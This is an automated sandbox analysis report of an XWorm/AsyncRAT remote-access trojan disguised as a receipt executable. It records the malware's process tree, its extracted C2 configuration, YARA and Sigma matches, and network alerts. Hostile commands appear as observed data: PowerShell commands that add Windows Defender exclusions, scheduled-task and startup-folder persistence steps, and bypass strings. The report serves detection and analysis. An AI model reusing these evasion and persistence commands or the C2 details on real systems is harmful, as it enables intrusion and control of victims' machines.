
Windows Analysis Report
Recaipt202431029.exe

Overview

General Information

Sample name: Recaipt202431029.exe
Analysis ID: 1580358
MD5: 7b8044f78e70383a436ebbae2df47808
SHA1: 002de1bb6aa1d9ef1a3f107cb7f5615be50f27a7
SHA256: b10e44ddfe6caff1127a964d4a5b9ebdbf9e92a24c2a2957e044dd45b14e8967
Tags: AsyncRAT, exe, RAT, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Recaipt202431029.exe (PID: 5548 cmdline: "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
    • powershell.exe (PID: 2232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1412 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Recaipt202431029.exe (PID: 612 cmdline: "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
  • JvkAPBBIe.exe (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe MD5: 7B8044F78E70383A436EBBAE2DF47808)
    • schtasks.exe (PID: 3168 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JvkAPBBIe.exe (PID: 1560 cmdline: "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
  • cleanup
{"C2 url": ["172.245.244.69"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source / Rule / Description / Author / Strings
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x87d5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8872:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8987:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8367:$cnc4: POST / HTTP/1.1
Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x77025:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x99845:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x770c2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x998e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x771d7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x999f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76bb7:$cnc4: POST / HTTP/1.1
  • 0x993d7:$cnc4: POST / HTTP/1.1
Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Source / Rule / Description / Author / Strings
Source: 0.2.Recaipt202431029.exe.3630650.3.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 0.2.Recaipt202431029.exe.3630650.3.unpack; Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x51d5:$str01: $VB$Local_Port
  • 0x51c6:$str02: $VB$Local_Host
  • 0x548a:$str03: get_Jpeg
  • 0x4eb3:$str04: get_ServicePack
  • 0x61f7:$str05: Select * from AntivirusProduct
  • 0x63f3:$str06: PCRestart
  • 0x6407:$str07: shutdown.exe /f /r /t 0
  • 0x64b9:$str08: StopReport
  • 0x648f:$str09: StopDDos
  • 0x6585:$str10: sendPlugin
  • 0x6723:$str12: -ExecutionPolicy Bypass -File "
  • 0x684c:$str13: Content-length: 5235
Source: 0.2.Recaipt202431029.exe.3630650.3.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen
  • 0x6bd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6c72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6d87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6767:$cnc4: POST / HTTP/1.1
Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack; Rule: rat_win_xworm_v3; Description: Finds XWorm (version XClient, v3) samples based on characteristic strings; Author: Sekoia.io
  • 0x51d5:$str01: $VB$Local_Port
  • 0x51c6:$str02: $VB$Local_Host
  • 0x548a:$str03: get_Jpeg
  • 0x4eb3:$str04: get_ServicePack
  • 0x61f7:$str05: Select * from AntivirusProduct
  • 0x63f3:$str06: PCRestart
  • 0x6407:$str07: shutdown.exe /f /r /t 0
  • 0x64b9:$str08: StopReport
  • 0x648f:$str09: StopDDos
  • 0x6585:$str10: sendPlugin
  • 0x6723:$str12: -ExecutionPolicy Bypass -File "
  • 0x684c:$str13: Content-length: 5235

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\Recaipt202431029.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe, ParentImage: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe, ParentProcessId: 1532, ParentProcessName: JvkAPBBIe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", ProcessId: 3168, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", ProcessId: 1488, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe

            Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", ProcessId: 1488, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T11:27:29.137140+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:34.318395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:42.161478+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:55.176764+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:04.239989+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:08.110138+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:17.962675+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:18.154571+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:30.317032+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:33.489741+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:33.681536+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:34.332061+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:44.253983+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:51.800841+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:53.785176+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:02.974065+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:04.441147+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:04.863672+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:05.262060+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:06.284365+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:11.643652+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:17.315188+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:17.582556+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:19.190382+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:24.783837+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:34.346903+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:37.846437+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:38.050741+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:48.736479+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:54.502249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:29:55.330883+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:04.073227+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:04.314256+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:06.173980+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:10.298346+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:10.490367+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.438980+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.642570+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:15.876503+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:28.698540+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:31.704643+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:31.962577+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:34.360302+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:36.784873+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.439402+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.642142+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.754785+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.876731+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:38.735990+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:42.220836+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:42.900893+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:52.125723+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:53.346873+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:53.547373+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:54.158191+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:58.641803+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:04.360023+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:06.579489+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:10.562881+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T11:27:29.157026+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:42.163195+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:55.182702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:08.111637+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:17.964947+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:18.156536+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:30.322102+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:33.797868+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:33.917464+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:44.258854+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:51.812752+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:53.788402+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:02.975687+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:05.264129+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:05.551152+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:06.288161+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:11.645831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.316966+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.584264+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.776910+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:17.896637+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:19.192354+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:24.786409+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:37.852594+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
